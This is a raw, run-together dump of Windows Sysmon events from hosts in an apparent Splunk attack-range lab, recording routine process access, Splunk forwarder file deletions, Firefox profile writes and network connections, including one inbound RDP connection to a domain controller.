08:04:28.448{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809813Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.448{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809812Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:28.448{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809811Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.448{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809810Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:28.448{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809809Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.448{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F78C-60EB-CD79-00000000D001}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809808Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.448{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F78C-60EB-CD79-00000000D001}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809807Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.417{0C1E0330-F78C-60EB-CD79-00000000D001}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809806Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.182{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=55618E78E56C3978AEAEDF790197A2AC,SHA256=EC0529CEFEE353DA19E229409F992547549BA6E58BB6D945AB1128BA64CA5321,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:19.779{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61922-false10.0.1.12-8000- 23542300x8000000000000000809823Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:29.916{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AC3B74FEFB45075EE876564317C576E,SHA256=B9E4D795AD16EE7A7F64866FE4FCC41BACA55C7F72315F581A002355FA52ABB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:29.901{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4AC412A9F9F6AD578BE9C928A3FC1F66,SHA256=B159884AA0D341EFDD0F134640F177BA0FF4A3ACCB5F413B10276536EEFAA8C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:29.171{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F44F113C2B31C146F592AA1821E6468,SHA256=6A90C968A4F503A706FD08932DD459135934117FEBF8D53049066490E814B087,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809822Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:29.448{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=577EBB065E05EF8ADA573E7A6FA9DA54,SHA256=016156C4C88CCCC5A426F7DFC692BB5BE5AA16614AC3D1AD1F1B80E7D029B1CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809825Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:30.932{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=760983370FC81C5DF23BDA6CDB418BCF,SHA256=733D2DCEB6F19C8BE937FE3CBCB21C8483A12921510753151EFE45BF54BEF646,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:30.185{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80EBF5CCE5B97305985D97EC9679DE90,SHA256=C60736548241024FB3694008A5E504DEC90C27B1CA65B762ECED668915E6DA61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809824Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:30.182{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=6E0899461F30233E09779195062308E9,SHA256=CA8C854F2A46286EAAC41BAEDC6002586E08003C6B605EF8E6813F741FF29889,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809827Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:31.932{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2A1404776E9DD5C458EAB841DC6596E,SHA256=1A1D6453E03DF4DA4D00D73C228EEF4C453C8F54FD5B1FE670E5EB71D736A5E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.367{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-55177-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001053400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:31.216{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D293B9D12251B4A796BC17AEEE8E520C,SHA256=E1793B4FC091E438DC70DA075BE8F3DD94CFD74A69A2B194C2D0DCA720BC6668,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809826Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:29.394{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57421-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809828Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:32.932{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B735EF0FD3E44C361EF047D73EC0B0A,SHA256=161BFF0499D336705516CB4D5F9FC5DE2F2301F37520BB1152EF78FDF58DC155,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:32.231{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=784E4C5095CFDEA47EBA36B6C51666EF,SHA256=B0DFB2241D92AD0024C6AF1D8BF7A55BC181AF557357A4DB85345B94F6E94679,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:32.168{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D95779BEDF73FB21CEEC72DCB39FA773,SHA256=999EBA53109334C2C714FF065EBA50947F5F008F905397BDC9838BC3B0E01AF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:32.168{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F4E7906528823500EB8FD9BB432C2EBB,SHA256=B94787A6F89A0D11D0FD9893FF4FBDA668D5479F35CE68FCC49C8D18E7E6604F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809829Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:33.948{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=481BF66D36C5258EFF994EBBBD8E9A7D,SHA256=6E44A3D064CA08C0505349C6E0629E70E3A10817B4FB99CB8F1D95888A911948,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:33.248{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E30E625D5C3129949FEF1494674252F5,SHA256=08988825FC257E027A645C057CE30607ABC12C52BCE5F86D118738C500345B1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809830Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:34.951{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CD63D6AFF9208ABA6EFB646D70F4DD2,SHA256=1F33ED12530C8188A6F5AC6E613E163E6B5211494E5E6BFF24E841FF4E9641E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:34.267{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0B05E7B788C7A0C1C5B1F9FEEE513AB,SHA256=8CA145EFA0FAEBCC840CB50FF427E738FFED15E651244712EA3D1FA2CE052E82,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:25.577{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61923-false10.0.1.12-8000- 23542300x80000000000000001053408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:35.268{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B84B65A1E4A49D65BFE1CBA40E3E7540,SHA256=2A7F1022C0EF7712EBDB49B0CD008ABEC9E1A5E103E1601B02FE0DD5F1BBDCD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.281{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C81231BF49A6CF7B7B7E0A66CBC9FD8,SHA256=ACEC379EDFDDF89BF2A46A344ECACAE14D979BE4A71413DBB98FC006E1F4BA4F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809832Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:35.193{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57422-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809831Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:35.998{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=806B859A973F578F24093BA2678BBC36,SHA256=C0A37EE7CF065E792DBF12BDED84E21F88AE80F6A3DDC2A794529DBE83C23C61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=35028B573B7806FE2007DE111522CBC1,SHA256=D9859AA85BE09A19B0270E4E67D68C7FDA8EADE74DD4847D054677855ECD5ADC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1E68FDB428A44158BDCB06577CDB63F3,SHA256=2E0F02974DE937805B4FBF485699E7B24111A44D92B20AA708609EF72AC7354C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CAABA6F6A3ECDA8DC939F1A8310E488D,SHA256=C177DF108D7FD2DA1981475BEC3CCC214A2517353BCC3CAA4E691E4CEFE505BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=755B5D9CC72AA5D4144086D9D80A7D75,SHA256=508585F2DFE4CD5144E8EF5EDDCBB951CE54909B91A89BCF2187EA0CEBE0B775,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B1592BA0EA24A68CAF79A75BF9739113,SHA256=C5D1D59EA5BF145DEC5EE396127CAC5937A559F0DB44E5F3CC4C635B35C10325,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7BB658E2BEA922C157F0EB098DE93EBF,SHA256=10AAF263DF95E3FCCA6B32D37E03E19A7CA5C3371C4EAEBEBE631CFF8959A46D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9CADDD29793EE53CFB4D8735227A23DC,SHA256=F76F56D0A7D3CE0684E843EEBE1F902A8823250F989646FE15C1FFA771FA174B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=023AAFE8DAE1CE83443C60C87495CA1E,SHA256=F0791393597B7A5D18BCDC3950510082193EBA670324595A73A1F963007F2A6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1EFE4F21C6E26B6DBE394B2A4BBE04EA,SHA256=B10D8DB462805E95E478E2725D60CD36B6B462810C8942A279A7506A866315D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=75E3A62AA82D3B3F9BAA4D1A5B8CCD73,SHA256=9EF4BE6888E154647B131C7C64A313FC27D749D8AADE15C370CD63842C588F29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8B2321C63E45688CD01AF6636D56A66D,SHA256=55ED74CDBC318611EA74D01909592B9744ED0D68AFECB59EA18FD35375F30EC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 